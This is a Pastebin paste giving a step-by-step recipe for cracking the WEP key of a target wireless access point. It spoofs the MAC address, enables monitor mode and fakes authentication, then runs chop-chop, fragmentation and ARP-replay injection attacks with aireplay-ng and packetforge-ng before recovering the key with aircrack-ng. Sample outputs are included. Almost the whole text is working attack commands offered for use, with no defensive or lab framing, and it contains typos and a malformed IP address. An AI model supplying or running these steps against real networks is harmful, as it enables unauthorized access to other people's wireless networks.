Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- cracking wep encrypted network with clientless:
- -----------------------------------------------
- (1)spoof wireless card mac address
- (2)put wireless card into monitor mode
- (3)scan for the target AP using airodump-ng
- (4)fake authentication using aireplay-ng option -1
- (5)use korek chop chop attack, fragmentation attack or
- the old pre ptw method(aireplay -2 -p0841 option).
- (6)deauthenticate a non connected client from the AP(to speed up injecting, dunno but usually works)
- (7)find the wep key using aircrack-ng
- ------------------------------------------------
- (1)spoof our wireless card mac address:
- ifcoonfig ath0 down
- ifconfig wifi0 down
- macchanger --mac 00:11:22:33:44:55 wifi0
- my output is:
- Current MAC: <my mac> (unknown)
- Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
- (2)put wireless card into monitor mode:
- ifconfig wifi0 up
- ifconfig ath0 down
- airmon-ng start wifi0
- my output is:
- ...
- Interface Chipset Driver
- wifi0 Atheros madwifi-ng
- ath0 Atheros madwifi-ng VAP (parent: wifi0)
- ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
- (3)scan for the target AP using airodump-ng:
- airodump-ng ath1
- hit ctrl+c to quit, then observe the channel n copy n paste the bssid (mac address AP):
- airodump-ng -c <channel> -w <output> --bssid <APmac> rausb0
- (here we focus on specific Ap such dat we filter out any othr possibilty of intrference from othr Aps on d same chnnl,
- hence, reduce the chance of a failed auth/association or a failed attack)
- othr commands dat can be used:
- airodump-ng -w <output> --ivs -c <channel> ath1
- (4)fake authentication using aireplay-ng option -1:
- aireplay-ng -1 0 -e <APname> -a <APmac> -h <yourmac> ath1
- other command can be used:
- aireplay-ng -1 6000 -o 1 -q 10 -e <APname> -a <APmac> -h <yourmac> rausb0
- (5)use korek chop chop attack, fragmentation attack or
- the old pre ptw method(aireplay -2 -p0841 option):
- #korek chop-chop attack(-4 option):
- ----------------------------------
- 1-make a XOR packet using chop chop attack -4 option to use with packetfrg:
- aireplay-ng -4 -b <APmac> -h <yourmac> ath1
- wait n answer yes ..
- output is:
- Saving plaintext in replay_whatever.cap...
- Saving keystream in replay_whatever.xor
- 2-create an arp packet using packetforge-ng:
- packetforge-ng -0 -a <mac> -h <yourmac> -k 255.255.255.255 -l 255.255.255.255.255 -y replay_whatever.xor -w arp-request
- output is:
- wrote packet to: arp-request
- 3-inject the arp packet:
- aireplay-ng -2 -r arp-request ath1
- say yes... n wait..
- 4.find the wep key using aircrack-ng:
- aircrack-ng <output>*.cap
- #fragmentation attack (-5 option):
- ---------------------------------
- 1-make a XOR packet from frag attck -5 option(generate valid keystream)to use with packetfrg:
- aireplay-ng -5 -b <ApMac> -h <yrMac> ath1
- answer yes..
- output is:
- Saving keystream in replay_whatever.xor
- 2-create an arp packet using packetforge-ng:
- packetforge-ng -0 -a ApMac -h yrMac -k 255.255.255.255 -l 255.255.255.255.255 -y replay_whatever.xor -w arp-request
- 3-inject the arp packet:
- aireplay-ng -2 -r arp-request ath1
- answer yes... n wait
- 4.find the wep key using aircrack-ng:
- aircrack-ng <output>*.cap
- #the old pre ptw method(aireplay -2 -p0841 option):
- --------------------------------------------------
- 1.aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <ApMac> -h <yrMac> ath1
- 2.find the wep key using aircrack-ng:
- aircrack-ng <output>*.cap
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement